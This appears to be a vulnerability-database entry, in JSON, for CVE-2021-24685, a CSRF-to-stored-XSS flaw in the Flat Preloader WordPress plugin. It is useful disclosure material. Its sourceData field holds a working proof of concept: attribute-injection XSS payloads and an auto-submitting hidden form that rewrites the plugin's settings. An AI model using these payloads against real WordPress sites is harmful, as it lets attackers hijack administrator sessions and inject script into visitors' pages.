DATABASE RESOURCES PRICING ABOUT US

{"id": "WPEX-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting", "description": "The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload) The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4\n", "published": "2021-09-28T00:00:00", "modified": "2021-09-28T06:58:40", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, "href": "", "reporter": "apple502j", "references": [], "cvelist": ["CVE-2021-24685"], "immutableFields": [], "lastseen": "2021-11-26T19:20:23", "viewCount": 47, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24685"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24685"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceData": "Depending on the payload, the XSS will be triggered either in the frontend or backend:\r\n\r\nFrontend: \" onload=alert(/XSS/)//\r\nBackend: \" style=animation-name:rotation onanimationstart=alert(/XSS/)//\r\n\r\n<form action=\"https://example.com/wp-admin/options-general.php?page=flat-preloader\" method=\"post\" id=\"csrf\">\r\n<input type=\"hidden\" name=\"preloader-style\" value=\"windows-10/circles-menu-1.gif\">\r\n<input type=\"hidden\" name=\"preloader-display\" value=\"all\">\r\n<input type=\"hidden\" name=\"preloader[custom_image_url]\" value=\"\">\r\n<input type=\"hidden\" name=\"preloader[text_under_icon]\" value=\"\">\r\n<input type=\"hidden\" name=\"preloader[delay_time]\" value=\"\">\r\n<input type=\"hidden\" name=\"preloader[alt]\" value='PAYLOAD'>\r\n<input type=\"hidden\" name=\"save-option\" value=\"Save Changes\">\r\n</form>\r\n<script>csrf.submit()</script>", "generation": 0, "_state": {"dependencies": 1646048278}}

{"cve": [{"lastseen": "2022-03-23T15:01:25", "description": "The Flat Preloader WordPress plugin before 1.5.4 does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.5}, "published": "2021-11-01T09:15:00", "type": "cve", "title": "CVE-2021-24685", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24685"], "modified": "2021-11-02T17:03:00", "cpe": [], "id": "CVE-2021-24685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24685", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-11-26T19:20:23", "description": "The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload) The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4\n\n### PoC\n\nDepending on the payload, the XSS will be triggered either in the frontend or backend: Frontend: \" onload=alert(/XSS/)// Backend: \" style=animation-name:rotation onanimationstart=alert(/XSS/)// \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.5}, "published": "2021-09-28T00:00:00", "type": "wpvulndb", "title": "Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24685"], "modified": "2021-09-28T06:58:40", "id": "WPVDB-ID:972ECDE8-3D44-4DD9-81E3-643D8737434F", "href": "https://wpscan.com/vulnerability/972ecde8-3d44-4dd9-81e3-643d8737434f", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}